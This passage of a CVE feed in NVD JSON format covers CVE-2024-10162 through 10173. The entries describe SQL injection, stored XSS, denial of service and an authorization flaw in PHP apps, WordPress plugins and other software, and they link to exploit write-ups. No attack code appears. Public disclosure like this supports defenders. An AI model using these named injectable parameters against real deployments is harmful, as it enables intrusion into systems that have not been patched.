"cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_edit_subadmin_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_edit_subadmin_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280948", "name" : "VDB-280948 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280948", "name" : "VDB-280948 | PHPGurukul Boat Booking System Edit Subdomain Details Page edit-subadmin.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425449", "name" : "Submit #425449 | PHPGurukul Boat Booking System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in PHPGurukul Boat Booking System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/edit-subadmin.php of the component Edit Subdomain Details Page. The manipulation of the argument sadminusername/fullname/emailid/mobilenumber leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter \"mobilenumber\" to be affected. But it must be assumed that other parameters are affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T01:15Z", "lastModifiedDate" : "2024-10-21T21:36Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10163", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/2967607153/CVE-report/blob/main/Sourcecodester-SQLi-Sentiment-Based-Moive-Rating.md", "name" : "https://github.com/2967607153/CVE-report/blob/main/Sourcecodester-SQLi-Sentiment-Based-Moive-Rating.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280950", "name" : "VDB-280950 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280950", "name" : "VDB-280950 | SourceCodester Sentiment Based Movie Rating System movie_details.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425464", "name" : "Submit #425464 | SourceCodester Sentiment Based Movie Success Rating Prediction System v1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Sentiment Based Movie Rating System 1.0. It has been classified as critical. Affected is an unknown function of the file /msrps/movie_details.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher disclosure mentions a slightly changed product name." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:sentiment_based_movie_rating_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T02:15Z", "lastModifiedDate" : "2024-10-22T14:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10164", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/wpdm-premium-packages/#developers", "name" : "https://wordpress.org/plugins/wpdm-premium-packages/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c1758fc-5b0b-4071-b31b-1d72e34cc924?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c1758fc-5b0b-4071-b31b-1d72e34cc924?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpdmpp_pay_link shortcode in all versions up to, and including, 5.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-21T11:15Z", "lastModifiedDate" : "2024-11-21T13:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10165", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/14", "name" : "https://github.com/ppp-src/CVE/issues/14", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280951", "name" : "VDB-280951 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280951", "name" : "VDB-280951 | Codezips Sales Management System deletecustcom.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425636", "name" : "Submit #425636 | Codezips Sales Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Codezips Sales Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file deletecustcom.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:sales_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T03:15Z", "lastModifiedDate" : "2024-10-21T21:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10166", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/15", "name" : "https://github.com/ppp-src/CVE/issues/15", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280952", "name" : "VDB-280952 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280952", "name" : "VDB-280952 | Codezips Sales Management System checkuser.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425643", "name" : "Submit #425643 | Codezips Sales Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Codezips Sales Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file checkuser.php. The manipulation of the argument name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:sales_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T03:15Z", "lastModifiedDate" : "2024-10-21T21:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10167", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/16", "name" : "https://github.com/ppp-src/CVE/issues/16", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280953", "name" : "VDB-280953 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280953", "name" : "VDB-280953 | Codezips Sales Management System deletecustind.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425650", "name" : "Submit #425650 | Codezips Sales Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Codezips Sales Management System 1.0. This affects an unknown part of the file deletecustind.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:sales_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T03:15Z", "lastModifiedDate" : "2024-10-21T21:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10168", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4a13b13e-72d3-43c9-b5ec-d499f3b22091?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4a13b13e-72d3-43c9-b5ec-d499f3b22091?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/profit-products-tables-for-woocommerce/#developers", "name" : "https://wordpress.org/plugins/profit-products-tables-for-woocommerce/#developers", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3182136/", "name" : "https://plugins.trac.wordpress.org/changeset/3182136/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's woot_button shortcode in all versions up to, and including, 1.0.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pluginus:woot:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.0.6.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-06T12:15Z", "lastModifiedDate" : "2024-11-08T20:27Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10169", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/RainFo666/cve/issues/1", "name" : "https://github.com/RainFo666/cve/issues/1", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280954", "name" : "VDB-280954 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280954", "name" : "VDB-280954 | code-projects Hospital Management System change-password.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425745", "name" : "Submit #425745 | code-projects Hospital Management System Using PHP 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in code-projects Hospital Management System 1.0. This vulnerability affects unknown code of the file change-password.php. The manipulation of the argument cpass leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T04:15Z", "lastModifiedDate" : "2024-10-23T15:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1017", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252287", "name" : "https://vuldb.com/?ctiid.252287", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252287", "name" : "https://vuldb.com/?id.252287", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.youtube.com/watch?v=wwHuXfYS8yQ", "name" : "https://www.youtube.com/watch?v=wwHuXfYS8yQ", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.youtube.com/watch?v=wwHuXfYS8yQ", "name" : "https://www.youtube.com/watch?v=wwHuXfYS8yQ", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252287", "name" : "https://vuldb.com/?id.252287", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252287", "name" : "https://vuldb.com/?ctiid.252287", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Gabriels FTP Server 1.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument USERNAME leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252287." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gabriels_ftp_server_project:gabriels_ftp_server:1.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-29T19:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10170", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280955", "name" : "VDB-280955 | code-projects Hospital Management System get_doctor.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280955", "name" : "VDB-280955 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.426440", "name" : "Submit #426440 | code-projects Hospital Management System Using PHP 1,0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/zer0-1s/cve/issues/1", "name" : "https://github.com/zer0-1s/cve/issues/1", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in code-projects Hospital Management System 1.0. This issue affects some unknown processing of the file get_doctor.php. The manipulation of the argument specilizationid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T04:15Z", "lastModifiedDate" : "2024-10-21T21:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10171", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/cdl00/cve/blob/main/sql8-message-book.md", "name" : "https://github.com/cdl00/cve/blob/main/sql8-message-book.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280956", "name" : "VDB-280956 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280956", "name" : "VDB-280956 | code-projects Blood Bank System massage.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.426282", "name" : "Submit #426282 | code-projects blood-bank-system-in-php v1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in code-projects Blood Bank System up to 1.0. Affected is an unknown function of the file /admin/massage.php. The manipulation of the argument bid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:blood_bank_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-20T05:15Z", "lastModifiedDate" : "2024-10-21T21:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10172", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/void-visual-whmcs-element/#developers", "name" : "https://wordpress.org/plugins/void-visual-whmcs-element/#developers", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc4b52c6-1ac2-4f90-a776-c91232f5de34?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc4b52c6-1ac2-4f90-a776-c91232f5de34?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WPBakery Visual Composer WHMCS Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's void_wbwhmcse_laouts_search shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:voidcoders:wpbakery_visual_composer_whmcs_elements:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.0.4.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-21T11:15Z", "lastModifiedDate" : "2025-07-10T16:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10173", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-863" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/didi/DDMQ/issues/37", "name" : "https://github.com/didi/DDMQ/issues/37", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://github.com/didi/DDMQ/issues/37#issue-2577905007", "name" : "https://github.com/didi/DDMQ/issues/37#issue-2577905007", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280957", "name" : "VDB-280957 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280957", "name" : "VDB-280957 | didi DDMQ Console Module improper authentication", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.421516", "name" : "Submit #421516 | didi DDMQ 1.0 Authorization Bypass", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has 